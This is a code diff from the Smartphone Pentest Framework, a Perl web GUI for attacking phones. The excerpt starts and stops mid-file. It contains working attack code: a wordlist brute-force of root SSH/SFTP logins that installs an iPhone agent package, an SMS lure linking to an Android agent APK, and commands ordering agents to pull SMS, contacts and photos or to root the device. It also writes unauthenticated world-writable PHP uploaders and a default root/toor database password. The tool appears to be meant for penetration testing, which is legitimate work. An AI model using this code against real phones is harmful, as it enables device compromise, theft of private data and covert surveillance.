+ $sql2 = $dbh->prepare("INSERT INTO data (id,sms,contacts,picture,root) VALUES (DEFAULT, NULL, NULL, NULL, NULL)");
+ $sql2->execute();
+ $sql = $dbh->prepare("SELECT id from agents where number=?");
+ $idblah = $sql->execute($number1);
+ @rows = $sql->fetchrow_array();
+ $id = @rows[0];
+ @exec = (qw(perl agentpoll.pl),$path1,$key1,$id);
+ $pid = fork;
+ die "fork failed" unless defined $pid;
+ if ($pid ==0)
+ {
+ open STDIN,'<','/dev/null';
+ open STDOUT,'<','/dev/null';
+ open STDERR,'>&STDOUT';
+ exec {$exec[0]} @exec;
+ }
+
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
View
153 frameworkgui/attachMobileModem.pl
@@ -0,0 +1,153 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use Cwd;
+use DBI;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$number = $FORM{"modemPhoneNo"};
+$key = $FORM{"controlKey"};
+$path = $FORM{"appURLPath"};
+
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$Variables{"OS"} = $^O;
+#print "Content-type: text/html\r\n\r\n";
+#print "Connect Smartphone App";
+ $webserver = $Variables{WEBSERVER};
+ $fullpath = $webserver. $path;
+ $type = "app";
+ $number2 = "\"" . $number . "\"";
+ $path2 = "\"" . $path . "\"";
+ $key2 = "\"" . $key . "\"";
+ $type2 = "\"" . $type . "\"";
+ $command1 = "mkdir " . $fullpath;
+ system($command1);
+ $connectfile = $fullpath . "/connect";
+ $command2 = "touch " . $connectfile;
+ system($command2);
+ $command3 = "chmod 777 " . $connectfile;
+ system($command3);
+ $picturefile = $fullpath . "/picture.jpg";
+ $command4 = "touch " . $picturefile;
+ system($command4);
+ $command5 = "chmod 777 " . $picturefile;
+ system($command5);
+ $textfile = $fullpath . "/text.txt";
+ $command6 = "touch " . $textfile;
+ system($command6);
+ $command7 = "chmod 777 " . $textfile;
+ system($command7);
+ $textfile2 = $fullpath . "/text2.txt";
+ $command77 = "touch ". $textfile2;
+ system($command77);
+ $command7777 = "chmod 777 " . $textfile2;
+ system($command7777);
+ $pictureupload = $fullpath . "/pictureupload.php";
+ $command8 = "touch " . $pictureupload;
+ system($command8);
+ $command9 = "chmod 777 " . $pictureupload;
+ system($command9);
+ $pictureuploadtext = "<?php\n\$base=\$_REQUEST['picture'];\necho \$base;\n\$binary=base64_decode(\$base);\nheader('Content-Type: bitmap; charset=utf-8');\n\$file = fopen('picture.jpg', 'wb');\nfwrite(\$file, \$binary);\nfclose(\$file);\n?>";
+ open(PICFILE, ">",$pictureupload) or die "Couldn't open $pictureupload for writing! ($!)";
+ print PICFILE $pictureuploadtext;
+ close(PICFILE);
+ $textupload = $fullpath . "/textuploader.php";
+ $command10 = "touch " . $textupload;
+ system($command10);
+ $command11 = "chmod 777 " . $textupload;
+ system($command11);
+ $textuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
+ open(TEXTFILE, ">",$textupload) or die "Couldn't open $textupload for writing! ($!)";
+ print TEXTFILE $textuploadtext;
+ close(TEXTFILE);
+ $text2upload = $fullpath . "/text2uploader.php";
+ $command100 = "touch " . $text2upload;
+ system($command100);
+ $command110 = "chmod 777 " . $text2upload;
+ system($command110);
+ $text2uploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text2.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
+ open(TEXT2FILE, ">",$text2upload) or die "Couldn't open $text2upload for writing! ($!)";
+ print TEXT2FILE $text2uploadtext;
+ close(TEXT2FILE);
+ $connectupload = $fullpath . "/connectuploader.php";
+ $command12 = "touch " . $connectupload;
+ system($command12);
+ $command13 = "chmod 777 " . $connectupload;
+ system($command13);
+ $connectuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('connect','wb');\nfwrite(\$file, \$base);\n?>";
+ open(CONNECTFILE, ">",$connectupload) or die "Couldn't open $connectupload for writing! ($!)";
+ print CONNECTFILE $connectuploadtext;
+ close(CONNECTFILE);
+ $getfuncfile = $fullpath . "/getfunc";
+ $command6 = "touch " . $getfuncfile;
+ system($command6);
+ $command7 = "chmod 777 " . $getfuncfile;
+ system($command7);
+ $putfuncfile = $fullpath . "/putfunc";
+ $command6 = "touch " . $putfuncfile;
+ system($command6);
+ $command7 = "chmod 777 " . $putfuncfile;
+ system($command7);
+ $getfuncupload = $fullpath . "/getfuncuploader.php";
+ $command10 = "touch " . $getfuncupload;
+ system($command10);
+ $command11 = "chmod 777 " . $getfuncupload;
+ system($command11);
+ $getfuncuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('getfunc', 'wb');\nfwrite(\$file, \$base);\n?>";
+ open(GETFUNCUPLOADFILE, ">",$getfuncupload) or die "Couldn't open $getfuncupload for writing! ($!)";
+ print GETFUNCUPLOADFILE $getfuncuploadtext;
+ close(GETFUNCUPLOADFILE);
+ $putfuncupload = $fullpath . "/putfuncuploader.php";
+ $command10 = "touch " . $putfuncupload;
+ system($command10);
+ $command11 = "chmod 777 " . $putfuncupload;
+ system($command11);
+ $putfuncuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('putfunc', 'wb');\nfwrite(\$file, \$base);\n?>";
+ open(PUTFUNCUPLOADFILE, ">",$putfuncupload) or die "Couldn't open $putfuncupload for writing! ($!)";
+ print PUTFUNCUPLOADFILE $putfuncuploadtext;
+ close(PUTFUNCUPLOADFILE);
+ while(1){
+ $fullpath1 = $webserver. $path . "/connect";
+ open(CONNECTFILE, "+<",$fullpath1) or die "Couldn't open $fullpath1 for reading! ($!)";
+;
+ $line= <CONNECTFILE>;
+ $correctstring = $key . " CONNECT";
+ if ($line eq $correctstring)
+ {
+ $command = "\n" . $key . " CONNECTED";
+ print CONNECTFILE $command;
+ close(CONNECTFILE);
+ # print "CONNECTED!\n";
+ last;
+ }
+ else {
+ close(CONNECTFILE);
+ # sleep(1);
+ }
+ }
+ $modemtype = "app";
+ $sql = $dbh->prepare("INSERT INTO modems (id,number,path,controlkey,type) VALUES (DEFAULT,?,?,?,?)");
+ $sql->execute($number,$path,$key,$modemtype);
+ @exec = (qw(perl poller.pl),$path,$key);
+ $pid = fork;
+ die "fork failed" unless defined $pid;
+ if ($pid ==0)
+ {
+ open STDIN,'<','/dev/null';
+ open STDOUT,'<','/dev/null';
+ open STDERR,'>&STDOUT';
+ exec {$exec[0]} @exec;
+ }
+
+
+
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
View
BIN  frameworkgui/bulb.jpg
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
21 frameworkgui/config
@@ -0,0 +1,21 @@
+#SMARTPHONE PENTEST FRAMEWORK CONFIG FILE
+#ROOT DIRECTORY FOR THE WEBSERVER THAT WILL HOST OUR FILES
+WEBSERVER = /var/www
+#IPADDRESS FOR WEBSERVER (webserver needs to be listening on this address)
+IPADDRESS = 192.168.1.12
+#IP ADDRESS TO LISTEN ON FOR SHELLS
+SHELLIPADDRESS = 192.168.1.12
+#IP ADDRESS OF SQLSERVER 127.0.0.1 IF LOCALHOST
+MYSQLSERVER = 127.0.0.1
+#DATABASE TYPE (Mysql of Postgresql)
+DATABASETYPE = mysql
+#USERNAME OF THE MYSQL USER TO USE
+MYSQLUSER = root
+#PASSWORD OF THE MYSQL USER TO USE
+MYSQLPASS = toor
+#PORT MYSQL IS RUNNING ON (3306 IS DEFAULT)
+MYSQLPORT = 3306
+#LOCATION OF ANDROID APK FOR AGENT DROP
+ANDROIDAGENT = /var/www/frameworkgui/AndroidAgent.apk
+#LOCATION OF IPHONE DEB FOR AGENT DROP
+IPHONEAGENT = /var/www/frameworkgui/iphone.deb
View
61 frameworkgui/createDatabase.pl
@@ -0,0 +1,61 @@
+#!/usr/bin/perl
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$Variables{"OS"} = $^O;
+
+ $type = $Variables{"DATABASETYPE"};
+
+ $dropquery1 = "DROP TABLE IF EXISTS agents";
+ $dropquery2 = "DROP TABLE IF EXISTS data";
+ $dropquery3 = "DROP TABLE IF EXISTS modems";
+ $dropquery4 = "DROP TABLE IF EXISTS remote";
+ $dropquery5 = "DROP TABLE IF EXISTS client";
+ if ($type eq "postgres")
+ {
+ $createquery1 = "create table agents (id SERIAL NOT NULL PRIMARY KEY, number varchar(12),path varchar(1000), controlkey varchar(7), controlnumber varchar(12), platform varchar(12))"
+;
+ $createquery2 = "create table data (id SERIAL NOT NULL PRIMARY KEY, sms varchar(2000),contacts varchar(1000), picture varchar(100), root varchar(5))";
+ $createquery3 = "create table modems (id SERIAL NOT NULL PRIMARY KEY, number varchar(12), path varchar(1000), controlkey varchar(7), type varchar(3))";
+ $createquery4 = "create table remote (id SERIAL NOT NULL PRIMARY KEY, ip varchar(15), exploit varchar(200), vuln varchar(3), agent varchar(3))";
+ $createquery5 = "create table client (id SERIAL NOT NULL PRIMARY KEY, number varchar(12), exploit varchar(200), vuln varchar(3))";
+
+ }
+ elsif ($type eq "mysql")
+ {
+ $createquery1 = "create table agents (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12),path varchar(1000), controlkey varchar(7), controlnumber varchar(12), platform varchar(12))";
+ $createquery2 = "create table data (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, sms varchar(2000),contacts varchar(1000), picture varchar(100), root varchar(5))";
+ $createquery3 = "create table modems (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12), path varchar(1000), controlkey varchar(7), type varchar(3))";
+ $createquery4 = "create table remote (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, ip varchar(15), exploit varchar(200), vuln varchar(3), agent varchar(3))";
+ $createquery5 = "create table client (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12), exploit varchar(200), vuln varchar(3))";
+ }
+
+ $sql = $dbh->prepare($dropquery1);
+ $sql->execute;
+ $sql = $dbh->prepare($dropquery2);
+ $sql->execute;
+ $sql = $dbh->prepare($dropquery3);
+ $sql->execute;
+ $sql = $dbh->prepare($dropquery4);
+ $sql->execute;
+ $sql = $dbh->prepare($dropquery5);
+ $sql->execute;
+ $sql = $dbh->prepare($createquery1);
+ $sql->execute;
+ $sql = $dbh->prepare($createquery2);
+ $sql->execute;
+ $sql = $dbh->prepare($createquery3);
+ $sql->execute;
+ $sql = $dbh->prepare($createquery4);
+ $sql->execute;
+ $sql = $dbh->prepare($createquery5);
+ $sql->execute;
+#####This sends it back to the main page.
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
+
View
45 frameworkgui/directdownload.pl
@@ -0,0 +1,45 @@
+#!/usr/bin/perl
+use Cwd;
+use DBI;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$webserver = $Variables{"WEBSERVER"};
+ $ipaddress = $Variables{"IPADDRESS"};
+$path = $ARGV[0];
+ $filename = $ARGV[1];
+ $number = $ARGV[2];
+$platform = $ARGV[3];
+$modem = $ARGV[4];
+chomp($platform);
+if ($platform eq "android")
+{
+$link = "http://" . $ipaddress . $path . $filename;
+ $fullpath = $webserver. $path;
+ $command1 = "mkdir " . $fullpath;
+ system($command1);
+ $location = $Variables{"ANDROIDAGENT"};
+
+ $command = "cp " . $location . " " . $webserver . $path . $filename;
+ system($command);
+
+
+
+ $sql = $dbh->prepare("SELECT path from modems where id=?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from modems where id=?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing ($!)";
+ $command2 = $key2 . " " . "SEND" . " " . $number . " " . "This is a cool app: " . $link;
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+}
View
65 frameworkgui/escalatePrivileges.pl
@@ -0,0 +1,65 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use Cwd;
+use DBI;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$agent = $FORM{"agentsDD"};
+$delivery = $FORM{"deliveryMethodRB"};
+$modemNo = $FORM{"modemNoDD"};
+
+
+
+
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+#print "Content-type: text/html\r\n\r\n";
+$webserver = $Variables{"WEBSERVER"};
+
+$Variables{"OS"} = $^O;
+ $sql = $dbh->prepare("SELECT path from agents where number=?");
+ $results = $sql->execute($agent);
+ @rows = $sql->fetchrow_array();
+ $path = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from agents where number=?");
+ $results = $sql->execute($agent);
+ @rows = $sql->fetchrow_array();
+ $key = @rows[0];
+if ($delivery eq "HTTP")
+ {
+ $command = $key . " ROOT HTTP\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+ }
+ if ($delivery eq "SMS")
+ {
+
+ $sql = $dbh->prepare("SELECT id from modems where number=?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+ $command = $key . " " . "ROOT HTTP" . " " . $modem . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+}
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
+
+
+
+
View
108 frameworkgui/getContacts.pl
@@ -0,0 +1,108 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$agent = $FORM{"agentsDD"};
+$deliverymethod = $FORM{"deliveryMethodRB"};
+$returnmethod = $FORM{"returnMethodRB"};
+$modemNo = $FORM{"modemNoDD"};
+
+
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+#print "Content-type: text/html\r\n\r\n";
+$webserver = $Variables{"WEBSERVER"};
+
+$Variables{"OS"} = $^O;
+ $sql = $dbh->prepare("SELECT path from agents where number=?");
+ $results = $sql->execute($agent);
+ @rows = $sql->fetchrow_array();
+ $path = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from agents where number=?");
+ $results = $sql->execute($agent);
+ @rows = $sql->fetchrow_array();
+ $key = @rows[0];
+if ($returnmethod eq "SMS")
+ {
+
+ $sql = $dbh->prepare("SELECT id from modems where number=?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+
+ if ($deliverymethod eq "HTTP")
+ {
+ $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+
+
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $sql = $dbh->prepare("SELECT id from modems where number=?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+ $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+ }
+ }
+
+
+ if ($returnmethod eq "HTTP")
+ {
+
+ if ($deliverymethod eq "HTTP")
+ {
+ $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+
+ }
+ if ($deliverymethod eq "SMS")
+ {
+
+ $sql = $dbh->prepare("SELECT id from modems where number=?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+ $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+
+
+ }
+
+ }
+
+
+
+
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
+
View
94 frameworkgui/getDatabase.pl
@@ -0,0 +1,94 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$agent = $FORM{"agentsDD"};
+$deliverymethod = $FORM{"deliveryMethodRB"};
+$returnmethod = $FORM{"returnMethodRB"};
+$modemNo = $FORM{"modemNoDD"};
+
+
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+#print "Content-type: text/html\r\n\r\n";
+$webserver = $Variables{"WEBSERVER"};
+
+$Variables{"OS"} = $^O;
+ $sql = $dbh->prepare("SELECT path from agents where number=?");
+ $results = $sql->execute($agent);
+ @rows = $sql->fetchrow_array();
+ $path = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from agents where number=?");
+ $results = $sql->execute($agent);
+ @rows = $sql->fetchrow_array();
+ $key = @rows[0];
+
+if ($returnmethod eq "SMS")
+ {
+ $sql = $dbh->prepare("SELECT id from modems where number=?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+ $command = $key . " " . "SMSS" . " " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
+ if ($deliverymethod eq "HTTP")
+ {
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+ }
+
+
+ }
+ if ($returnmethod eq "HTTP")
+ {
+ if ($deliverymethod eq "HTTP")
+ {
+ $command = $key . " SMSS " . $deliverymethod . " " . $returnmethod . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $sql = $dbh->prepare("SELECT id from modems where number=?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+ $command = $key . " SMSS " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+
+}
+}
+
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
+
+
View
33 frameworkgui/guessPassword.pl
@@ -0,0 +1,33 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+my %Variables = SPF::readconfig();
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$ipAddress = $FORM{"ipAddressTB"};
+$passwordFile = $FORM{"passwordFileTB"};
+
+
+##----- put your code here
+
+my @exec = (qw(perl guessattack.pl),$ipAddress,$passwordFile);
+$pid = fork;
+die "fork failed" unless defined $pid;
+if ($pid ==0) {
+ open STDIN,'<','/dev/null';
+ open STDOUT,'<','/dev/null';
+ open STDERR,'>&STDOUT';
+ exec {$exec[0]} @exec;
+}
+
+
+
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
View
66 frameworkgui/guessattack.pl
@@ -0,0 +1,66 @@
+#!/usr/bin/perl
+use Cwd;
+use DBI;
+use Expect;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$Variables{"OS"} = $^O;
+$ipaddress = $ARGV[0];
+$passfile = $ARGV[1];
+ $vulnerable = "no";
+ $agent = "no";
+ $command = 'sftp';
+ $param = "root@" . $ipaddress;
+ $timeout = 10;
+ $notfound = "ssh: connect to host " . $ipaddress . " port 22: Connection refused";
+ $passwordstring = $parm . "'s password: ";
+ $location = $Variables{"IPHONEAGENT"};
+ $putfile = $location;
+ $connectstring = "Connecting to " . $ipaddress . "...";
+ $installcommand = "dpkg -i " . "iphone.deb" . "\n";
+ $guesspassword = "null";
+ open(READFILE, "<",$passfile) or die "Couldn't open $passfile for reading! ($!)";
+ while(<READFILE>)
+ {
+ $guess = $_;
+ $guess2 = $guess . "\n";
+ $exp = Expect->spawn($command, $param) or die "Cannot spawm sftp command";
+ $exp->expect($timeout,[$connectstring]);
+ $exp->expect($timeout,["Are you sure you want to continue connecting (yes/no)?", sub {my $self = shift; $self->send("yes\n");}]); #[$notfound, return]);
+ $exp->expect($timeout, $passwordstring);
+ $exp->send($guess2);
+ if ($exp->expect($timeout, ["sftp>"]))
+ {
+ $vulnerable="yes";
+ $guesspassword = $guess;
+ $exp->send("put $putfile\n");
+ $exp->expect($timeout, ["sftp>"]);
+ $exp->send("bye\n");
+ $command2 = "ssh";
+ $exp = Expect->spawn($command2, $param);
+ $exp->expect($timeout, $passwordstring);
+ $exp->send($guess2);
+ $exp->expect($timeout, [qr'root\s*']);
+ $exp->send($installcommand);
+ $exp->expect($timeout, "Setting up com.bulbsecurity.tooltest (0.0.1-23) ...");
+ $exp->send("tooltest\n");
+ if($exp->expect($timeout,["Smartphone Pentest Framework Agent"]))
+ {
+ $agent="yes";
+ }
+ $exp->send("exit");
+ $exp->soft_close();
+ last;
+ }
+ }
+ close READFILE;
+ $guessstring = "Guess: " . $guesspassword;
+ $sql = $dbh->prepare("INSERT INTO remote (id,ip,exploit,vuln,agent) VALUES (DEFAULT,?,?,?,?)");
+ $sql->execute($ipaddress,$guessstring,$vulnerable,$agent);
+
+
+
View
BIN  frameworkgui/iphone.deb
Binary file not shown
View
43 frameworkgui/lib/SPF.pm
@@ -0,0 +1,43 @@
+package SPF;
+use Cwd;
+
+our $SPF_DBH;
+
+sub readconfig {
+ my ($config) = @_;
+ $dir = getcwd;
+ $configfile = $dir . "/config";
+ my %Variables;
+ open(CONFIG, "<",$configfile);
+ while (<CONFIG>)
+ {
+ chomp;
+ s/#.*//;
+ s/^\s+//;
+ s/\s+$//;
+ my ($var, $value) = split(/\s*=\s*/, $_, 2);
+ $Variables{$var} = $value;
+ }
+ return %Variables;
+}
+
+sub dbconnect {
+ # short circuit returning active database handle
+ return $SPH_DBH if (ref($SPH_DBH) && $SPH_DBH->ping());
+
+ my (%Variables) = @_;
+ $sqlserver = $Variables{"MYSQLSERVER"};
+ $username = $Variables{"MYSQLUSER"};
+ $password = $Variables{"MYSQLPASS"};
+ $port = $Variables{"MYSQLPORT"};
+ $type = $Variables{"DATABASETYPE"};
+
+ if ($type eq "postgres") {
+ $SPH_DBH = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password) or die "Couldn't connect to database! ($DBI::errstr)";
+ } elsif ($type eq "mysql") {
+ $SPH_DBH = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password) or die "Couldn't connect to database! ($DBI::errstr)";
+ }
+ return $SPH_DBH;
+}
+
+1;
View
BIN  frameworkgui/littleBulb.jpg
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
547 frameworkgui/menu.pl
@@ -0,0 +1,547 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$Variables{"OS"} = $^O;
+
+$sqlserver = $Variables{"MYSQLSERVER"};
+ $username = $Variables{"MYSQLUSER"};
+ $password = $Variables{"MYSQLPASS"};
+ $port = $Variables{"MYSQLPORT"};
+ $type = $Variables{"DATABASETYPE"};
+ if ($type eq "mysql")
+ {
+ if (! defined $dbh)
+ {
+ (@exec) = qw(mysqladmin -u ),$username,"-p",$port,"-h",$sqlserver,qw(create framework -p),$password;
+ system {$exec[0]} @exec;
+ $dbh = SPF::dbconnect(%Variables);
+ }
+
+ }
+ $sql = $dbh->prepare("SELECT number from agents");
+ $sql2 = $dbh->prepare("SELECT number from modems");
+
+
+print "Content-type: text/html \n\n";
+print <<"EOT";
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
+"http://www.w3.org/TR/xhtml1/DTD/transitional.dtd">
+
+<html>
+
+<head>
+ <title>SmartPhone PenTest Framework V0.1</title>
+ <meta name="author" content="Georgia Weidman" />
+
+ <link rel="stylesheet" href="styles.css" />
+
+
+
+ <script language="javascript" type="text/javascript">
+ <!--
+
+ function resetButtons()
+ {
+ document.getElementById("attach").style.display="none";
+ document.getElementById("attachRadio").style.display="block";
+ document.getElementById("sendCommand").style.display="none";
+ document.getElementById("sendCommandRadio").style.display="block";
+ document.getElementById("infoGathered").style.display="none";
+ document.getElementById("infoGatheredRadio").style.display="block";
+ document.getElementById("attachMobileModem").style.display="none";
+ document.getElementById("attachMobileModemRadio").style.display="block";
+ document.getElementById("remoteAttack").style.display="none";
+ document.getElementById("remoteAttackRadio").style.display="block";
+ document.getElementById("SEorCSAttack").style.display="none";
+ document.getElementById("SEorCSAttackRadio").style.display="block";
+ document.getElementById("database").style.display="none";
+ document.getElementById("databaseRadio").style.display="block";
+
+ }
+
+ function resetOptions()
+ {
+ document.getElementById("deliveryMethod").style.display="none";
+ document.getElementById("returnMethod").style.display="none";
+ document.getElementById("message").style.display="none";
+ document.getElementById("submitSend").style.display="none";
+ document.getElementById("submitPicture").style.display="none";
+ document.getElementById("submitContacts").style.display="none";
+ document.getElementById("submitGetDatabase").style.display="none";
+ document.getElementById("submitEscalate").style.display="none";
+ document.getElementById("recipient").style.display="none";
+ document.getElementById("modemNumber").style.display="none";
+ }
+
+
+
+ function showDiv(divName, radio)
+ {
+ resetButtons();
+ document.getElementById(divName).style.display="block";
+ document.getElementById(radio).style.display="none";
+ }
+
+ function showDiv2(divName)
+ {
+ document.getElementById(divName).style.display="block";
+ }
+
+ function hideDiv(divName)
+ {
+ document.getElementById(divName).style.display="none";
+ }
+
+
+ function confirmAndCreate()
+ {
+ var answer=confirm("This will destroy your data. Are you sure you want to do this?");
+ if (answer)
+ submitForm(1);
+ }
+ function showButton(divName)
+ {
+ document.getElementById(divName).style.display="block";
+ }
+ function submitForm(which)
+ {
+ if (which == 1)
+ document.forms["main"].action="createDatabase.pl";
+ else if (which == 2)
+ document.forms["main"].action="SEAttack.pl";
+ else if (which == 3)
+ document.forms["main"].action="CSAttack.pl";
+ else if (which == 4)
+ document.forms["main"].action="remoteAttack.pl";
+ else if (which == 5)
+ document.forms["main"].action="search.pl";
+ else if (which == 6)
+ document.forms["main"].action="attachMobileModem.pl";
+ else if (which == 7)
+ document.forms["main"].action="viewInfo.pl";
+ else if (which == 8)
+ document.forms["main"].action="sendSMS.pl";
+ else if (which == 9)
+ document.forms["main"].action="takePic.pl";
+ else if (which == 10)
+ document.forms["main"].action="getContacts.pl";
+ else if (which == 11)
+ document.forms["main"].action="getDatabase.pl";
+ else if (which == 12)
+ document.forms["main"].action="escalatePrivileges.pl";
+ else if (which == 13)
+ document.forms["main"].action="attach2Agents.pl";
+ else if (which == 14)
+ document.forms["main"].action="guessPassword.pl";
+
+ document.forms["main"].submit();
+ }
+
+ function modemNum()
+ {
+ if(document.getElementById('smsDelivery').checked || document.getElementById('smsReturn').checked)
+ showDiv2("modemNumber");
+ else hideDiv("modemNumber");
+
+ }
+
+
+
+ //-->
+ </script>
+</head>
+<body>
+<form id="main" name="main" method="post">
+<fieldset>
+ <legend><img src="bulb.jpg" height="100" width="350"></legend>
+ <br /><br />
+
+<!-- ------------Attach -------->
+
+
+<div id="attachRadio"><input type="radio" name="options" value="Attach " onClick="showDiv('attach','attachRadio')" />
+ Attach Framework to Deployed Agent
+ <br />
+</div>
+<div id="attach" name="attach" >
+
+<fieldset>
+ <legend>Attach Framework to Deployed Agent</legend>
+ <br />
